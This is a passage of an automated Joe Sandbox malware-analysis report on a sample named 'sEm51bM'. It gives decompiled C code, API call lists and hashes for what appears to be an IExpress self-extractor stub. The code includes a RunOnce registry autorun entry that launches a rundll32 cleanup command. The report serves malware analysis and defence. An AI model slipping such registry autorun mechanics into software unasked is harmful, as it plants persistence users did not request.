                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032428d
                                                                                                                                                                                                                                            0x00324293
                                                                                                                                                                                                                                            0x003242e6
                                                                                                                                                                                                                                            0x003242e9
                                                                                                                                                                                                                                            0x003242ef
                                                                                                                                                                                                                                            0x003242f4
                                                                                                                                                                                                                                            0x003242f7
                                                                                                                                                                                                                                            0x00324300
                                                                                                                                                                                                                                            0x00324307
                                                                                                                                                                                                                                            0x0032430e
                                                                                                                                                                                                                                            0x00324315
                                                                                                                                                                                                                                            0x0032431c
                                                                                                                                                                                                                                            0x00324322
                                                                                                                                                                                                                                            0x00324326
                                                                                                                                                                                                                                            0x0032432d
                                                                                                                                                                                                                                            0x0032432d
                                                                                                                                                                                                                                            0x0032432f
                                                                                                                                                                                                                                            0x00324334
                                                                                                                                                                                                                                            0x00324343
                                                                                                                                                                                                                                            0x00324349
                                                                                                                                                                                                                                            0x0032434d
                                                                                                                                                                                                                                            0x00324354
                                                                                                                                                                                                                                            0x00324354
                                                                                                                                                                                                                                            0x0032435d
                                                                                                                                                                                                                                            0x0032436e
                                                                                                                                                                                                                                            0x0032436e
                                                                                                                                                                                                                                            0x0032437d
                                                                                                                                                                                                                                            0x00324383
                                                                                                                                                                                                                                            0x00324387
                                                                                                                                                                                                                                            0x0032438e
                                                                                                                                                                                                                                            0x0032438e
                                                                                                                                                                                                                                            0x00324387
                                                                                                                                                                                                                                            0x00324391
                                                                                                                                                                                                                                            0x00324399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324295
                                                                                                                                                                                                                                            0x0032429f
                                                                                                                                                                                                                                            0x003242a5
                                                                                                                                                                                                                                            0x003242aa
                                                                                                                                                                                                                                            0x003242aa
                                                                                                                                                                                                                                            0x003242ad
                                                                                                                                                                                                                                            0x003242ad
                                                                                                                                                                                                                                            0x003242af
                                                                                                                                                                                                                                            0x003242b0
                                                                                                                                                                                                                                            0x003242b6
                                                                                                                                                                                                                                            0x003242c2
                                                                                                                                                                                                                                            0x003242c8
                                                                                                                                                                                                                                            0x003242ce
                                                                                                                                                                                                                                            0x003242e4
                                                                                                                                                                                                                                            0x003242e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003242ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00324236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0032424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00324263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0032427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,003288C0,?,00000001), ref: 0032429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(003288C0,00651181,?,00000001), ref: 003242C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(003288C0,00000000,?,00000001), ref: 003242D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00324391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003243A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 7f0a3ac8cb48dd77b13c751164898c2a4666f579b4c034f423b31201b44b5709
                                                                                                                                                                                                                                            • Instruction ID: c19d8ff9efc20780400f71342bfadb596bd35987077103719f09c3a76cbf60fc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f0a3ac8cb48dd77b13c751164898c2a4666f579b4c034f423b31201b44b5709
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA412978A01324EFD723AF74FC84AAE7BB8EB49744F05456DEA41A7291CB758C02C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00322773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00321781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E0032658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E0032658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0x321140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00321680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x00322773
                                                                                                                                                                                                                                            0x0032277e
                                                                                                                                                                                                                                            0x00322785
                                                                                                                                                                                                                                            0x0032278a
                                                                                                                                                                                                                                            0x0032278d
                                                                                                                                                                                                                                            0x00322790
                                                                                                                                                                                                                                            0x00322792
                                                                                                                                                                                                                                            0x00322798
                                                                                                                                                                                                                                            0x0032279d
                                                                                                                                                                                                                                            0x003228b2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003227a3
                                                                                                                                                                                                                                            0x003227a3
                                                                                                                                                                                                                                            0x003227af
                                                                                                                                                                                                                                            0x003227c2
                                                                                                                                                                                                                                            0x003227c8
                                                                                                                                                                                                                                            0x003227cd
                                                                                                                                                                                                                                            0x003227d5
                                                                                                                                                                                                                                            0x003228b7
                                                                                                                                                                                                                                            0x003228b9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003227db
                                                                                                                                                                                                                                            0x003227dd
                                                                                                                                                                                                                                            0x003228aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003227e3
                                                                                                                                                                                                                                            0x003227e3
                                                                                                                                                                                                                                            0x003227ec
                                                                                                                                                                                                                                            0x003227f8
                                                                                                                                                                                                                                            0x00322803
                                                                                                                                                                                                                                            0x0032280b
                                                                                                                                                                                                                                            0x00322831
                                                                                                                                                                                                                                            0x003228c3
                                                                                                                                                                                                                                            0x003228c9
                                                                                                                                                                                                                                            0x003228cd
                                                                                                                                                                                                                                            0x00322837
                                                                                                                                                                                                                                            0x0032285a
                                                                                                                                                                                                                                            0x0032285c
                                                                                                                                                                                                                                            0x00322865
                                                                                                                                                                                                                                            0x00322892
                                                                                                                                                                                                                                            0x00322895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322867
                                                                                                                                                                                                                                            0x00322878
                                                                                                                                                                                                                                            0x0032288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032287a
                                                                                                                                                                                                                                            0x00322880
                                                                                                                                                                                                                                            0x00322885
                                                                                                                                                                                                                                            0x00322897
                                                                                                                                                                                                                                            0x00322899
                                                                                                                                                                                                                                            0x00322899
                                                                                                                                                                                                                                            0x00322878
                                                                                                                                                                                                                                            0x00322865
                                                                                                                                                                                                                                            0x003228a0
                                                                                                                                                                                                                                            0x003228bf
                                                                                                                                                                                                                                            0x003228c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003228c1
                                                                                                                                                                                                                                            0x00322831
                                                                                                                                                                                                                                            0x003227dd
                                                                                                                                                                                                                                            0x003227d5
                                                                                                                                                                                                                                            0x003228e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(2C4B51C8,00000000,00000000,00000000), ref: 003227A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 003227B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 003227BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003228A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003228AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 003228B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003227E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 0541825808ae35e36988e0c4fa1c823c74f65fcf5e19a4b9d51481dbb361ac42
                                                                                                                                                                                                                                            • Instruction ID: eb4eca6058ad4c7576d9663b33ec3ba5c4c18a84bfd43770dcc1066528f26823
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0541825808ae35e36988e0c4fa1c823c74f65fcf5e19a4b9d51481dbb361ac42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E419371E0013CAFDB269B64AC85AEF77BDEF55700F0140A9F549D2110DBB09E869FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00322267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0x328530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E0032658A( &_v268, 0x104, 0x321140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E0032171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00322272
                                                                                                                                                                                                                                            0x00322277
                                                                                                                                                                                                                                            0x00322279
                                                                                                                                                                                                                                            0x00322283
                                                                                                                                                                                                                                            0x00322289
                                                                                                                                                                                                                                            0x003222ab
                                                                                                                                                                                                                                            0x003222b1
                                                                                                                                                                                                                                            0x003222c4
                                                                                                                                                                                                                                            0x003222e0
                                                                                                                                                                                                                                            0x003222e6
                                                                                                                                                                                                                                            0x003222f5
                                                                                                                                                                                                                                            0x0032230d
                                                                                                                                                                                                                                            0x0032231c
                                                                                                                                                                                                                                            0x0032231c
                                                                                                                                                                                                                                            0x00322321
                                                                                                                                                                                                                                            0x0032233a
                                                                                                                                                                                                                                            0x00322342
                                                                                                                                                                                                                                            0x00322348
                                                                                                                                                                                                                                            0x0032234b
                                                                                                                                                                                                                                            0x0032234c
                                                                                                                                                                                                                                            0x0032234c
                                                                                                                                                                                                                                            0x0032234e
                                                                                                                                                                                                                                            0x0032234f
                                                                                                                                                                                                                                            0x0032236e
                                                                                                                                                                                                                                            0x0032236e
                                                                                                                                                                                                                                            0x0032237a
                                                                                                                                                                                                                                            0x00322380
                                                                                                                                                                                                                                            0x00322380
                                                                                                                                                                                                                                            0x00322381
                                                                                                                                                                                                                                            0x00322381
                                                                                                                                                                                                                                            0x0032238f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003222A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003222D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003222F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00322305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0032236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0032237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • wextract_cleanup1, xrefs: 0032227C, 003222CD, 00322363
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00322321
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00322299
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0032232D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 3027380567-2048191181
                                                                                                                                                                                                                                            • Opcode ID: 6e11c6ef491cac7eaeb3ac1d0966f01754a350c59c97a378d8b9aa28eb7b70dc
                                                                                                                                                                                                                                            • Instruction ID: 1487df983fd5530660672154d388d319abadef49587fb325dd39ee2708ec11f8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e11c6ef491cac7eaeb3ac1d0966f01754a350c59c97a378d8b9aa28eb7b70dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D318475A002287BDB23DB51EC49FDB777CEF55710F0001A9F54DAA051DA71AB89CA50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00323100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0x328590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0x328590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E003243D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0x328d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0x3288b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E003230C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00323108
                                                                                                                                                                                                                                            0x0032310b
                                                                                                                                                                                                                                            0x003231b7
                                                                                                                                                                                                                                            0x003231ca
                                                                                                                                                                                                                                            0x003231d0
                                                                                                                                                                                                                                            0x003231d0
                                                                                                                                                                                                                                            0x003231da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003231da
                                                                                                                                                                                                                                            0x00323111
                                                                                                                                                                                                                                            0x00323114
                                                                                                                                                                                                                                            0x00323136
                                                                                                                                                                                                                                            0x00323136
                                                                                                                                                                                                                                            0x00323138
                                                                                                                                                                                                                                            0x0032313b
                                                                                                                                                                                                                                            0x00323141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323143
                                                                                                                                                                                                                                            0x00323116
                                                                                                                                                                                                                                            0x0032311b
                                                                                                                                                                                                                                            0x0032314b
                                                                                                                                                                                                                                            0x00323151
                                                                                                                                                                                                                                            0x00323158
                                                                                                                                                                                                                                            0x0032316a
                                                                                                                                                                                                                                            0x00323176
                                                                                                                                                                                                                                            0x0032317d
                                                                                                                                                                                                                                            0x0032318b
                                                                                                                                                                                                                                            0x0032319e
                                                                                                                                                                                                                                            0x003231a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003231ad
                                                                                                                                                                                                                                            0x00323120
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032312a
                                                                                                                                                                                                                                            0x00323134
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323134
                                                                                                                                                                                                                                            0x0032312c
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 0032313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0032314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 0032316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00323176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0032317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00323185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00323190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,003230C0), ref: 003231A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003231CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
